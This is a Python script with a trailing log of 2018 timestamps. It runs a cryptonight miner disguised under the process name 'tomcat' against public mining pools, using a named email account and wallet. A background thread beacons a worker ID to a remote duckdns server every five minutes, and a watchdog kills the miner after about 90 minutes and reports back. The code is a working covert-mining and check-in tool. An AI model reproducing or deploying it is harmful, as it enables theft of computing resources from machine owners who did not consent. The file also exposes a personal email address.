import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:56:01.253986
#2018-02-17 16:44:06.207318
#2018-02-17 18:33:01.235197
#2018-02-17 20:21:01.450837
#2018-02-17 22:08:03.136324
#2018-02-17 23:52:05.331604
#2018-02-18 01:42:01.502938
#2018-02-18 03:29:05.568305
#2018-02-18 05:17:01.328048
#2018-02-18 07:09:04.025778
#2018-02-18 08:57:01.379932
#2018-02-18 10:44:04.905507
#2018-02-18 12:29:07.281494
#2018-02-18 14:16:07.677733
#2018-02-18 16:06:01.960374
#2018-02-18 17:54:05.349146
#2018-02-18 19:41:04.976150
#2018-02-18 21:26:03.651353
#2018-02-18 23:14:06.853545
#2018-02-19 01:01:04.341025
#2018-02-19 02:48:06.193881
#2018-02-19 04:34:01.902940
#2018-02-19 06:19:03.999052
#2018-02-19 08:06:08.695216
#2018-02-19 09:56:07.926763
#2018-02-19 11:44:08.657990
#2018-02-19 13:32:07.650838
#2018-02-19 15:21:02.199952
#2018-02-19 17:09:01.978607
#2018-02-19 18:54:08.019683
#2018-02-19 20:33:05.133401
#2018-02-19 22:19:06.246917
#2018-02-20 00:06:06.758607
#2018-02-20 01:54:01.781050
#2018-02-20 03:44:08.422418
#2018-02-20 05:30:10.087789
#2018-02-20 07:15:04.417759
#2018-02-20 09:02:07.864550
#2018-02-20 10:45:10.031044
#2018-02-20 12:33:04.683531
#2018-02-20 14:18:01.331875
#2018-02-20 16:02:11.610913
#2018-02-20 17:50:08.267238
#2018-02-20 19:41:07.817170
#2018-02-20 21:29:04.127413
#2018-02-20 23:12:06.232823
#2018-02-21 00:54:08.669419
#2018-02-21 02:42:05.619179
#2018-02-21 04:29:07.457866
#2018-02-21 06:16:04.070642
#2018-02-21 08:02:04.738487
#2018-02-21 09:49:06.271852
#2018-02-21 11:37:06.099368
#2018-02-21 13:25:09.291700
#2018-02-21 15:10:06.114531
#2018-02-21 17:01:04.200263
#2018-02-21 18:50:03.009754
#2018-02-21 20:38:08.813575
#2018-02-21 22:23:08.782483
#2018-02-22 00:15:10.542627
#2018-02-22 02:04:01.960117
#2018-02-22 03:49:06.384980
#2018-02-22 05:36:06.447627
#2018-02-22 07:21:06.511477
#2018-02-22 09:09:08.311934
#2018-02-22 10:57:05.791676
#2018-02-22 12:42:07.290587
#2018-02-22 14:28:07.899730
#2018-02-22 16:15:09.812695
#2018-02-22 18:01:07.468906
#2018-02-22 19:49:05.492874
#2018-02-22 21:39:08.828894
#2018-02-22 23:28:06.703119
#2018-02-23 01:18:01.568746
#2018-02-23 03:03:06.407093
#2018-02-23 04:51:05.935325
#2018-02-23 06:37:05.907937
#2018-02-23 08:26:07.642724
#2018-02-23 10:41:09.863977
#2018-02-23 12:39:04.618213
#2018-02-23 14:24:06.385716
#2018-02-23 16:15:10.054423
#2018-02-23 18:02:08.968310
#2018-02-23 19:47:06.566015
#2018-02-23 21:31:05.527408
#2018-02-23 23:18:08.082350
#2018-02-24 01:09:01.625664
#2018-02-24 03:01:04.139199
#2018-02-24 04:47:06.824905
#2018-02-24 06:32:06.706003
#2018-02-24 08:21:03.615758
#2018-02-24 10:04:05.844092
#2018-02-24 12:02:06.133181
#2018-02-24 13:50:07.755214
#2018-02-24 15:43:01.657887
#2018-02-24 17:36:04.613770
#2018-02-24 19:22:06.994916
#2018-02-24 21:13:06.111587
#2018-02-24 23:48:02.047262
#2018-02-25 03:07:06.111278
#2018-02-25 06:53:05.043227